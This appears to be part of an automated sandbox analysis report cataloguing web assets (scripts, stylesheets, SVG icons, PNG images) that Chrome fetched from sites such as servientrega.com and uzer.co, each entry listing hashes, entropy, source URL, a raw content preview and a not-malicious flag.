style="stop-color:#009A44"/>......<stop offset="1" style="stop-color:#56C271"/>....
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:C source, ASCII text, with very long lines (65103)
            Category:downloaded
            Size (bytes):209939
            Entropy (8bit):5.366006952026174
            Encrypted:false
            SSDEEP:3072:1P6RsHIwj0PdUgdbs8kvdYkODdlm9AZoZXs+eSc:1msHIxHMvd8dtZoZDc
            MD5:FA4C76A7FDE62B18054CF7EB8E946012
            SHA1:B20150066A879D2B78DD3D4908F4ACD148EE66F8
            SHA-256:09EBD7F407439990AAC227E70DA23E1A819E8E30282928E324370805F480BEC4
            SHA-512:D72F5D078675C7ADBF6BFC1980712542A10668AEC9163137A2EC70A5E117F8FFDD0F06A6C4C6636E35C04F2754F33D40C65C59D452AFAA8EA4A382F24F200ABD
            Malicious:false
            Reputation:low
            URL:https://s.go-mpulse.net/boomerang/4PH5J-KTPZT-Y7BBJ-X8RU2-HCZ9X
            Preview:/*. * Copyright (c) 2011, Yahoo! Inc. All rights reserved.. * Copyright (c) 2011-2012, Log-Normal, Inc. All rights reserved.. * Copyright (c) 2012-2017, SOASTA, Inc. All rights reserved.. * Copyright (c) 2017, Akamai Technologies, Inc. All rights reserved.. * Copyrights licensed under the BSD License. See the accompanying LICENSE.txt file for terms.. */./* Boomerang Version: 1.720.0 b17966bb92f8ac2ddcda4ac1d9c0aaea6d2eda7b */..BOOMR_start=(new Date).getTime();function BOOMR_check_doc_domain(e){if(window){if(!e){if(window.parent===window||!document.getElementById("boomr-if-as"))return;if(window.BOOMR&&BOOMR.boomerang_frame&&BOOMR.window)try{BOOMR.boomerang_frame.document.domain!==BOOMR.window.document.domain&&(BOOMR.boomerang_frame.document.domain=BOOMR.window.document.domain)}catch(t){BOOMR.isCrossOriginError(t)||BOOMR.addError(t,"BOOMR_check_doc_domain.domainFix")}e=document.domain}if(e&&-1!==e.indexOf(".")&&window.parent){try{window.parent.document;return}catch(t){try{document.doma
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):1450
            Entropy (8bit):5.015913032797666
            Encrypted:false
            SSDEEP:24:2dUnjTxJ24apEvD41d02MwOd0vDtDDOOaFYb4apEvD41dEDZAMwOdaQGwyo6pUiK:cUjTVMvpDyOaJ0pLHvqX
            MD5:861946EDCA51B5DD1F3319A35D4CD17E
            SHA1:143DB14A398ED5B1AC71475C5C67142A595C5E88
            SHA-256:9583D70C1382D43CCAE85F3DDEDE41C68AEB67F377FF963D22EB2F8B407EF92C
            SHA-512:D66C8E644B955A7B91CD86B545CB1994642BA85C8B3F3B8070427D12FDFD3AD3B49B77BED45D987E985F12CF1EC07C6CC8D671D3E3882A1DD666452FE9FB4474
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/images/svg/ico-yt.svg
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="23px" viewBox="0 0 23 23" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="Group-23">.. <path d="M11.5 23C17.8513 23 23 17.8513 23 11.5C23 5.14873 17.8513 0 11.5 0C5.14873 0 0 5.14873 0 11.5C0 17.8513 5.14873 23 11.5 23Z" id="Oval" fill="#BFBFBF" fill-rule="evenodd" stroke="none" />.. <g id="youtube-(1)" transform="translate(4.791687 6.708252)">.. <path d="M10.8843 0L2.5324 0C1.12365 0 0 1.19834 0 2.66101L0 7.40149C0 8.88179 1.14042 10.0625 2.5324 10.0625L10.8843 10.0625C12.293 10.0625 13.4167 8.86416 13.4167 7.40149L13.4167 2.66101C13.4167 1.19834 12.2763 0 10.8843 0ZM4.9474 7.20764L4.9474 2.87248L8.46927 5.04006L4.9474 7.20764Z" id="Icon_23_" fill="#FFFFFF" stroke="none" />.. </g>.. <path d="M11.5 23C17.8513 23 23 17.8513 23 11.5C23 5.14873 17.8513 0 11.5 0C5.14873 0 0 5.14873 0 11.5C0 17.8513 5.14873 23 11.5 23Z" id="Oval-Copy" fill="#FF0000" fill-
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):2838
            Entropy (8bit):4.679811325846089
            Encrypted:false
            SSDEEP:48:cZmjhJ+1uIgdV3epaQxOhd0xKOST4koIfWPAwwOHmI0Thxymx+3Kx:Y2hJ1zMaQxQd0bST47IfW4wwOHm97vxF
            MD5:705F54F66EDDFE96EE6CFB8C48C2B1E7
            SHA1:FC4F7597920E53010F518C95E4A2610FA4BF5877
            SHA-256:42CBEB652DB6C8EE78A058C7BF733A600E3EA59868CB9085E8DFBCAD7AEEBA44
            SHA-512:C5D07F972E76B67021D0022699B45065EB0EAF5F102DBFBAC1B0538ECDEAB00EB626CE273A7A26223819E23D97AC4AA5DC8C6689C1F0EEFA0786051DFAE78E65
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="UTF-8"?>..<svg width="55px" height="55px" viewBox="0 0 55 55" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">.. <title>Group 32</title>.. <g id="HOME" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">.. <g transform="translate(-650.000000, -1051.000000)" id="Group-32">.. <g transform="translate(650.000000, 1051.000000)">.. <g id="Group-53" fill="#4112DD">.. <rect id="Rectangle" x="0" y="0" width="55" height="55" rx="18"></rect>.. </g>.. <g id="bullseye-2" transform="translate(13.000000, 13.000000)" fill="#FFFFFF" fill-rule="nonzero">.. <g id="bullseye">.. <path d="M25.0848975,5.17683011 L23.7799203,3.8826367 L23.7799203,0 L19.7199469,4.1702666 L19.4299772,7.47769995 L15.2249621,11.6479665 C14.9349355,11.6479665 14.7899507,11.6479665 14.499981,11.6479665 C12.9049772,11.64
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (2199), with no line terminators
            Category:downloaded
            Size (bytes):2199
            Entropy (8bit):4.941820353272718
            Encrypted:false
            SSDEEP:48:N8qwiwD0+a1lnAYTtpxg2DU+eH3D+NyjtHQEwezrnkQ:NOg9AYlgKU+er5HQhezQQ
            MD5:87D66528CEA61C0BFB68CDE1B4A4691A
            SHA1:436D18118EE42D6CE7D793C643035AFC41DDDB56
            SHA-256:B76FFBB2665F82B493E054B50D3D1BB3F2A8B4233BE1795CA9937956EEF196BC
            SHA-512:C5C0EDEC349AB935B4A61810C2B27E449CFA93562ABE66AD0A491488E9566122F6310E338DCD71C27FA5D12C19004BBBF569DC4E200912DFBC4FAA8376A7E2CD
            Malicious:false
            Reputation:low
            URL:https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Preview:button,hr,input{overflow:visible}audio,canvas,progress,video{display:inline-block}progress,sub,sup{vertical-align:baseline}html{font-family:sans-serif;line-height:1.15;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0} menu,article,aside,details,footer,header,nav,section{display:block}h1{font-size:2em;margin:.67em 0}figcaption,figure,main{display:block}figure{margin:1em 40px}hr{box-sizing:content-box;height:0}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}a{background-color:transparent;-webkit-text-decoration-skip:objects}a:active,a:hover{outline-width:0}abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}b,strong{font-weight:bolder}dfn{font-style:italic}mark{background-color:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative}sub{bottom:-.25em}sup{top:-.5em}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (747), with CRLF line terminators
            Category:dropped
            Size (bytes):221559
            Entropy (8bit):4.194297379037849
            Encrypted:false
            SSDEEP:6144:EfW4XQMWjosJowdWJQBiVjnC61kd/RVedVTg3zqJgIZGFK5j07OPfy:EfWfMWjJJowdWJQBiVjnC61kd/RVedV8
            MD5:31EDD2CD32A9B1FFC7B8BFB3B63C2466
            SHA1:9BD71D96357619444B1BF7721F96C70169509C89
            SHA-256:C9A4D911294B0E6D7A8DD0376277D82D0634CB5D58389C97B19A99392F70227D
            SHA-512:43CAF8CAFD371DAB46D57D6772BC9CB895CE871971DF0617FD2E3093F3ED96D78635F19B62DC69E5509838D2DA26F1037CE9D562F8807F40F97D60D0DEA0E0E7
            Malicious:false
            Reputation:low
            Preview:(function (c) {.. function d(a) {.. a.each(function () {.. var a = c(this),.. b = a.data("animation");.. a.addClass(b).one("webkitAnimationEnd animationend", function () {.. a.removeClass(b).. }).. }).. }.. var b = c("#xtrategy-slide"),.. e = b.find(".carousel-item:first").find("[data-animation ^= 'animated']");.. b.carousel();.. d(e);.. b.on("slide.bs.carousel", function (a) {.. a = c(a.relatedTarget).find("[data-animation ^= 'animated']");.. d(a).. })..})(jQuery);..var $jscomp = $jscomp || {};..$jscomp.scope = {};..$jscomp.arrayIteratorImpl = function (b) {.. var c = 0;.. return function () {.. return c < b.length ? {.. done: !1,.. value: b[c++].. } : {.. done: !0.. }.. }..};..$jscomp.arrayIterator = function (b) {.. return {.. next: $jscomp.arrayIteratorImpl(b).. }..};..$jscomp.ASSUME_ES5 =
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with CRLF line terminators
            Category:downloaded
            Size (bytes):2287
            Entropy (8bit):4.668928453189724
            Encrypted:false
            SSDEEP:48:kMBqaFD5H2ozCNiWuicUiircsiiIuicBii849l9GYJbWHBFM:XWZ59l5BWHBC
            MD5:CEDD8D18743498B5785769502C97A80A
            SHA1:DF08775CFDBD765BC1DA083D78BD35BA242050F8
            SHA-256:470E31154D0AC42631B2566A7FAE07B3892C3064617C7A638CF9B0F0C6D5E21D
            SHA-512:643EC3DA3407173451158F4451FEFD26C8A36AFFEA8B41363B59B634BEED96086CD04B9AEA2AF97BFF16B5E8D96E8A8AE2BCD70B75CCF4F20E33CC22156F8F04
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/js/main-02.js
            Preview:jQuery(document).ready(function($) {....//-------------------------- STICKY MENU......var stickyOffset = $('.main-menu').offset().top;....$(window).scroll(function(){.. var sticky = $('.main-menu'),.. scroll = $(window).scrollTop();.... if (scroll >= stickyOffset) sticky.addClass('fixed');.. else sticky.removeClass('fixed');..});....//-------------------------- FUNCIONES RESPONSIVE...... var alterClass = function() {.. var ww = document.body.clientWidth;.. if (ww < 950) {.. $('.menu-container').addClass('offcanvas offcanvas-start').attr("visibility", "visible");.. $('.submenu-collapse').removeClass('show');.. $('.first-lvl').addClass('collapsed').attr('data-bs-toggle', 'collapse');.. $('.second-lvl').addClass('collapsed').attr('data-bs-toggle', 'collapse');.. $('.sub-menu-container').addClass('collapse');.... } else if (ww >= 951) {.. $('.menu-container').removeClass('offcanvas offcanvas-start').attr("visibility", "hidden");.. $('.su
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Unicode text, UTF-8 text, with very long lines (41169)
            Category:downloaded
            Size (bytes):41172
            Entropy (8bit):5.505998162296305
            Encrypted:false
            SSDEEP:768:j21xCdwV69Odf9dk1fV8iWUwcb9x8cvgBhpU9yC8IEVDlbth3Ia8DdEN:iP3kr8V8vShi98Iiph3IbC
            MD5:0AA5002702487976D570A640C408EBA5
            SHA1:48930F22A2396DF313CCDFCB91CAC20E38F2B06B
            SHA-256:4E8276AEA0A3C7FE3600E6718C7F484D49C347C8D5763D89BE95900D526A14DA
            SHA-512:37A9D609DB21EE1E696CB437C02F0F6410925EB10B6353C0CDF95DB265E342F0BC3D2AE1851D209E4517D978B7CCBE8AD56F98247FA865AE405FAFD4D2E62CDA
            Malicious:false
            Reputation:low
            URL:https://snap.licdn.com/li.lms-analytics/insight.min.js
            Preview:!function(){"use strict";function n(n,t,e){return t in n?Object.defineProperty(n,t,{value:e,enumerable:!0,configurable:!0,writable:!0}):n[t]=e,n}var t,e,r,i,o={ADVERTISING:"ADVERTISING",ANALYTICS_AND_RESEARCH:"ANALYTICS_AND_RESEARCH",FUNCTIONAL:"FUNCTIONAL"},a="GUEST",u="MEMBER",c=0,l=1,d=2,s=(n(t={},a,"li_gc"),n(t,u,"li_mc"),t),f=function vr(){var n=arguments.length>0&&arguments[0]!==undefined?arguments[0]:null,t=arguments.length>1&&arguments[1]!==undefined?arguments[1]:null,e=arguments.length>2&&arguments[2]!==undefined?arguments[2]:null,r=arguments.length>3&&arguments[3]!==undefined?arguments[3]:null;for(var i in function(n,t){if(!(n instanceof t))throw new TypeError("Cannot call a class as a function")}(this,vr),n=n||{},this.consentAvailable=!1,this.issuedAt=t,this.userMode=e,this.optedInConsentMap={},o)n[i]=n[i]||c,n[i]!==c&&(this.consentAvailable=!0),this.optedInConsentMap[i]=n[i]===l||n[i]===c&&r===l},v=(e=[o.ADVERTISING,o.ANALYTICS_AND_RESEARCH,o.FUNCTIONAL],r=[c,l,d,c],i=new R
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):794
            Entropy (8bit):5.11917794828243
            Encrypted:false
            SSDEEP:24:2dUnn3XxJRTH9WDhUs06wAGejnQ5+5TgzOj/WR02:cUnntH94XwAuQSg/Wf
            MD5:95B334F2497AE6927DBA9AAAAF001989
            SHA1:DEBB12709A29EBE01E9645C582E05CFA6CD1D871
            SHA-256:3C6937313996B6046D6FC011474762476571232049620732CE9AA9FB72D151AA
            SHA-512:F011E00B49A386227E9E93324391FE8D41A0632E36B56691DB3B837EC76CAB92B78E8E6A73522C73FD10EE8C3F11FF758A5ADF1AE8BC763A66FD0C81E7CE0120
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/images/svg/flag-per.svg
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="16px" viewBox="0 0 23 16" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="peru">.. <path d="M1.72253 0C0.771174 0 0 0.77315 0 1.72694L0 13.3807C0 14.3344 0.771174 15.1076 1.72253 15.1076L7.66668 15.1076L7.66668 0L1.72253 0Z" id="Path" fill="#FF4B55" stroke="none" />.. <path d="M0 0L7.66682 0L7.66682 15.1077L0 15.1077L0 0Z" transform="translate(7.666992 0.00018310547)" id="Rectangle" fill="#F5F5F5" stroke="none" />.. <path d="M5.94415 0L0 0L0 15.1076L5.94415 15.1076C6.89546 15.1076 7.66668 14.3344 7.66668 13.3806L7.66668 1.72694C7.66668 0.77315 6.89551 0 5.94415 0Z" transform="translate(15.333496 0)" id="Path" fill="#FF4B55" stroke="none" />.. </g>..</svg>
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (51030)
            Category:downloaded
            Size (bytes):51215
            Entropy (8bit):4.7178157025083465
            Encrypted:false
            SSDEEP:768:oQa31EzKOSd6lGUxPfXkQMT/mMcj3wbRQU9nQzh:oQrz706lGO/BMStsKU2l
            MD5:1CC6C92172D124FBD305BA3D8E263333
            SHA1:D24F4D0E56617D3663D5A929500F05A17D71246E
            SHA-256:9E4CAC65C7A5EE0BD0743AFEFCABDD3E73854E1284AC9AC433813D6231F550F2
            SHA-512:41F0DDEF89A583C69F812AA6DD5AB643AE5EF5BDF1321241E0667D39C1C3572D6167AA6A0493D65A732C2835CCECD20DA0AA8900D34606E551229209E5DA207C
            Malicious:false
            Reputation:low
            URL:https://use.fontawesome.com/releases/v5.5.0/css/all.css
            Preview:/*!. * Font Awesome Free 5.5.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */..fa,.fab,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pull-lef
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 1800 x 1431, 8-bit colormap, non-interlaced
            Category:downloaded
            Size (bytes):524759
            Entropy (8bit):7.970282536262908
            Encrypted:false
            SSDEEP:12288:Xrw+tbFzRV2X8xjoDSOS8tJgTZrWpkSWeafbSGjy4o:GMxc+OS8tJgNrWe+EbSAs
            MD5:4D4656D2EA917FDBF919F4A1BAE28DBE
            SHA1:9A9A3F5D69B1AD23F9D1C8079E79978A5B1F37CF
            SHA-256:61A2F20C9DC2A89DBF7626BE9D882A6042FF516417B246A932CAFB46FE84E92A
            SHA-512:2E0C4881089A4531481ECE1D61AC6FA2D5DAE89FA8E4895F646151F632D89842BCFCE6D5C2C5CF43BC92F36539966C8C50E760044481B381871859D77EDE6DB5
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/port5.png
            Preview:.PNG........IHDR.............d.......PLTE.;~..e.C..F......a.B..>...f.6}....3z..i.:../w.#m.*s....'p?#...h..b.!n.!h./u.h...`.v..?..`..G.....O..W.B9L....6y.'m....KO.=K.,q..[. e+)3.DM*..#....v........`....D/%.'j;( ...:!.L6,..z2..1 .....p......WV>3...4v..n./p..rb@0..]D'........c.JDP...v_kH7.pYV7).jU81?.]H.ePO.!.....k.wZvN<..]`G;zWD..._P.&g..Z........{b..t.......Y..../m...oUm".kPB.^.6....f.l.|..+g.XI]......V......|..QB.iP.....g.`I.}d..........n..})!.u]...d[.|a....m.H:(".zu}.?2J.....$..'...2(*'..T?......s...X.....bR.lU......b0&.ke.j.t:/!.......@6...sZL.LB.qa..nd.1..........}........v...9B. Q..2~....[M.ysk.{.e.....'/...sy.S~.[WY...QV.U...Bkff.......BZ...4@....a`....Ai..D~Pc.L}..............XA..Pc......ovrn......V.$/...o].A....}.IE.....@xs.J.k"...&...............tRNS...1.r....IDATx.....0..'.R.G.r.W..{../...2....c.|......>.O|........v....).{k=.X.q...Z...........].....'..Ek....F...M...^t}.Xb.e...._...C...[...~e..*.;..c....h![.{.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 800 x 850, 8-bit/color RGBA, non-interlaced
            Category:dropped
            Size (bytes):52862
            Entropy (8bit):7.92993089354858
            Encrypted:false
            SSDEEP:768:r4lptayUmyKqBaI+fDVMJ+sZOXzMkZSOB9mA+xkoOWvSFiOZCOwiob:ratarpaLfsrOjMkZSI/+xxOWvkixb
            MD5:F66616C97E5316D1B83CF7BD6B160709
            SHA1:86521CF16109A1638DEE6124758F8276FA3DC396
            SHA-256:BC3493F00D4A5BE9322BB2992ED05888CEE2836DCD0A36F21C360975B9E6E9D3
            SHA-512:8CA11C8D0451A0414165D9ABFBD20A3E099F5632A7BE9ACB071916414564817D1E15F6B515E2527FA34E9343556A5FFFDA7739ABC1A30E41CBDCDEE334B1EF0E
            Malicious:false
            Reputation:low
            Preview:.PNG........IHDR... ...R.............pHYs.................sRGB.........gAMA......a.....IDATx.....%U...".FhD.. ..."..9g$G.0c....7.@T$.$Q......&....*A2...7.=_...[.NU.:..{......t.{...^k.=....N$I.$)...I.$I...D.$IR4. .$I..1..$I.....$I..h.@$I.$Ec."I.$)...I.$I...H.$I...D.$IR4. .$I..1..$I.....$I..h.@$I.$Ec."I.$)...I.$I...H.$I...D.$IR4. .$I..1..$I.....$I..h.@$I.$Ec."I.$)...I.$I...H.$I.f.D...&M.4....K$I....$I..h.@$I.$Ec."I.$)...I.$I...H.$I...D.$IR4. .$I..1..$I.....$I..h.@$I.$Ec."I.$)...I.$I...H.$I...D.$IR4. .$I..1..$I.....$I..h.@$I.$Ec."I.$)...I.$I...H.$I...D.$IR4. .$I..1..$I.....$I..h.@$I.$Ec."I.$)...I.$I...H.$I...D.$IR4. .$I..1..$I.....$I..h.@$I.$Ec."I.$)...I.$I...H.$I...D.$IR4. .$I..1..$I.....$I..h.@$I.$Ec."I.$)...I.$I...H.$I...D.$IR4. .$I..1..$I.....$I..h.@$I.$E3c"I.F...._../..<.........K...?%.'ON....'...?...~;.~...f.!.i...Yf.%.}....X Yh.....\0y...HR.M.?...$I5L.4i....(>....{.7y....D.z.;.....W\1..G?...=.I$...@$I.....Y...&$w.yg..+...ttB.d...K.\s.d.%.Lf...I.1..$.f.....M7..p.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 600 x 360, 8-bit colormap, non-interlaced
            Category:downloaded
            Size (bytes):8664
            Entropy (8bit):7.926215771184888
            Encrypted:false
            SSDEEP:192:Ido6HtBkCpSuMFY5b77xB5yPSBviM+1fOpGYHNBjWiOH1:mQCr7xryP+qFw1O
            MD5:BD6657FF14B9D89DECDC542F685E3C52
            SHA1:70DFE451D4B11E31CFFF428615028551399CC744
            SHA-256:861F3D84D4C0BFC46E4D0A99889AA1C534C5E237AEB357E18D9C5B46556D1EE7
            SHA-512:6EF4E5ECFD3A6A7402215134AB6CF40F4E3AC57C0B71B76BF57FEAE24A67ED1F41A523B9514DF4FD8DDEFD101D615BD03C7BD287FCE97960B5BDB495FE30A8B1
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/imagen-blog-03.png
            Preview:.PNG........IHDR...X...h......*u.....PLTE.......D..z...{..............wt....```...YW`......\Z`...Ty....hfp......^]`...;:@...ppp...wu....JIP.........w...........@@@...;I....PPP...@N.=<@......JHP...NMP 1.....!...........3......9Y....k...........,N.F.J..@....3...[Y`.......,.......ooo..N....1.1.. ...%.....Z......;[.....;........Rm.Fc.......$<....j..o...Xd...t..`y........u~.IV....`.._x.Wr.......}....=...............f...gq.,;s.:p..lSm........?....Kk..L..B.......s......@..R......&.P]..L..&...d@O`?BP..4 !'.........p{...p@AG8.;Ig..r..8.....c......nmp..k0?P /@,/>..1..-....J.......k..\...../`.0O.2G.a....>W....h..T... .....D....PT`....Y.j..^.....je.......R.. .4K..=.`ah].cSX`//0......xF.$....cn.~x.AJ~ /|t.|_ho >` +]Q.VP..1f.......D_.....`.`l..>.:..yF}.,|LTpi.o..( ....IDATx...1..0..0..|......1..$.6i...............................o..N.a.....I#..d.P..4.K......(Tpr+..J..?..su..zr.pK....z8.......M.\b.^.4g{Iy>K.?./}R..B.!...<..,."w...P....S.N.|.2..X.8,..%EaQX.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 1800 x 1431, 8-bit colormap, non-interlaced
            Category:dropped
            Size (bytes):406566
            Entropy (8bit):7.975683961155173
            Encrypted:false
            SSDEEP:6144:RL+hcDMt4CJXzhh7Mdx0orzE1EtiYfC5BfZFK7pi+tXbpOIg8OCOJ:RL+hcD44CthiHZeki26de7pi+trngXLJ
            MD5:A58416B2DB34E27B77AB35DB1A5A9C65
            SHA1:1ABBF0F42E20C8406C6B1D3E36691D83EB047D0C
            SHA-256:5C8DFDCDF65578E7C5A6C5EDC4BA285D7819D36CD6542D9617A16561D41D2A34
            SHA-512:C464CB444485EC778BC00B99130EA5BCE04CB9D4B93F349E0EE92B1D186044DCAA8F264C26B1CB52A3789BA82FBE780344FC7CF577AF0C42D21C9D0CDDC88DE3
            Malicious:false
            Reputation:low
            Preview:.PNG........IHDR.............d.......PLTE........A.....C..6..>.....3..;..9"$'...../.."........%..!..,........(... "$............$'(.."..<..$...(+-..(.. A8I.!0..(....&:&)+.#5..7.(?..3..,..8..)...."D:M..-.. ..(*-1..-..'.. .+E.03.....64,;.."..#.....#..,..,..7.....2..%..0-/0........3..;................................1..(.. .....2..... ...246QTY!!..........KMR..&(,% &..%..'EGJ.........IKNNQU..%......$(.......;3D..H..-UX^,..678'..ijj..K...!.......*'#/...2..,2'9;>131ACF.....8>?B...pnu...).........&..............{z~7..49+...]^_...vvw0W...z..GX.def?v.28.:w.<B/...%t.At.^]j..4Z..KX....;v...m|-Wc-...NX-m..EM*.....Fy.*1%.6w.&4...,bp+a..)W.GI8=F...Xz.C8F]..<E0..7dRb...6_t...t..;..^..L..SJXl...)3FhsAX...XZ......y..$>}3e...]X........^...o....p.....[kB...R........V._H...m"...}b.|.P...n6wl...5......F..N..0.IDATx..n.6.E.a....~....-./..s.'......H.%.4..3..v..........?.y1.......<..T.~.>..3.Li....+.....X.Tv9........d..xh....O....1.Y...5E..6..s.....]..iW.....n.O..Z..*......".v..
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):14355
            Entropy (8bit):4.274057131627799
            Encrypted:false
            SSDEEP:384:1c5AJ5R2PugrvZlhPgzRC3fItouTdntz0zxNRm0Gk:1cCHRG4w3fItb47Rx
            MD5:A285FBD394AD0945F44F98DB3A7CBA67
            SHA1:18E804624CE2F1474F2A83BB863C72BFE1ACF05B
            SHA-256:3F321027E83D192F47931DE7BB7141C30FC2D6C1D87FDFAF3F3FE90B8804EED8
            SHA-512:47068094834F624617B564F9BD312C8BCDA987756C8FA902B2635BAEDE5DDAE29FC3A2EE3DB3625BF5F5FAE2770B6EB5E221DF599EC5C7D3A572C8BC9051EB6C
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="182px" height="31px" viewBox="0 0 182 31" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <defs>.. <linearGradient x1="0.48428887" y1="1.0148883" x2="0.51598674" y2="-0.014888338" id="gradient_1">.. <stop offset="0" stop-color="#009A44" />.. <stop offset="1" stop-color="#56C271" />.. </linearGradient>.. <linearGradient x1="-0.0007526911" y1="0.5000954" x2="1" y2="0.5000954" id="gradient_2">.. <stop offset="0" stop-color="#C5C5C5" />.. <stop offset="0.2" stop-color="#DADADA" />.. <stop offset="0.47" stop-color="#EEEEEE" />.. <stop offset="0.74" stop-color="#FBFBFB" />.. <stop offset="1" stop-color="#FFFFFF" />.. </linearGradient>.. <linearGradient x1="-0.00091793993" y1="0.50000405" x2="0.9996366" y2="0.50000405" id="gradient_3">.. <stop offset="0" stop-color="#FFFFFF" />.. <stop offset="0.26" stop-color="#FBFBFB" />.. <stop
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 900 x 482, 8-bit/color RGBA, non-interlaced
            Category:downloaded
            Size (bytes):51025
            Entropy (8bit):7.939141782982505
            Encrypted:false
            SSDEEP:1536:r1iO2ft5urzFNWW/r8I5dO4ATMOVEtMNpST/EA6W:5iO2ftczFf/r8MmOZqW
            MD5:8E8D5CA57E1637C852FA76D427CA3629
            SHA1:F2E2C3D5E66602DB808AC72E0321C47DB8CC8AB2
            SHA-256:0C7FFB070F449E091841923DF40F92B066541AF7A477FD861E41D360A757BBC3
            SHA-512:F410377CCB9FCAEE7766850C99148E75D2AADB7A1B1ACD8F28C9242A08911FCEE7B5C1AC9457388FCFB40042FC86799600FB0E470CF2BA8DA6372D858D02E454
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/design-sprints-home.png
            Preview:.PNG........IHDR..............|.U....tEXtSoftware.Adobe ImageReadyq.e<....IDATx....xTU...sg&..J(R.D@.."....b].c]u...V%..*`o.W]{[.7.DTD@DT:$.)IH..3s...,..d&3.L..=.u....3.s.S...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."."g..+...h......X.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 1000 x 795, 8-bit/color RGBA, non-interlaced
            Category:dropped
            Size (bytes):558043
            Entropy (8bit):7.977517373391414
            Encrypted:false
            SSDEEP:12288:9Dj8IlPr21o26kpsXbpoKzupYTQR8FECli7ii5iIXxgqj1ZRO8ge1h:9DQIJrUo26kpCSDGT3EClUiiJgqjpO8P
            MD5:0021ADD0A8713492C3440917B8DF4328
            SHA1:86A6BA178D8054BDDA07A30665F11C13AA9E107C
            SHA-256:615B1D268C974963076765EB7A20BDB8619F2EB321F0C62D941FF05F57BBDB17
            SHA-512:1C86410D816C1E1E7C6A5D0BA8F026AD9D2B149897A6D4FB5E8B19F8737EF6BC97EE2C8D6C46AA0027D2BEEBE11705AEFF722D2F99E30675E0446132EFC83B7A
            Malicious:false
            Reputation:low
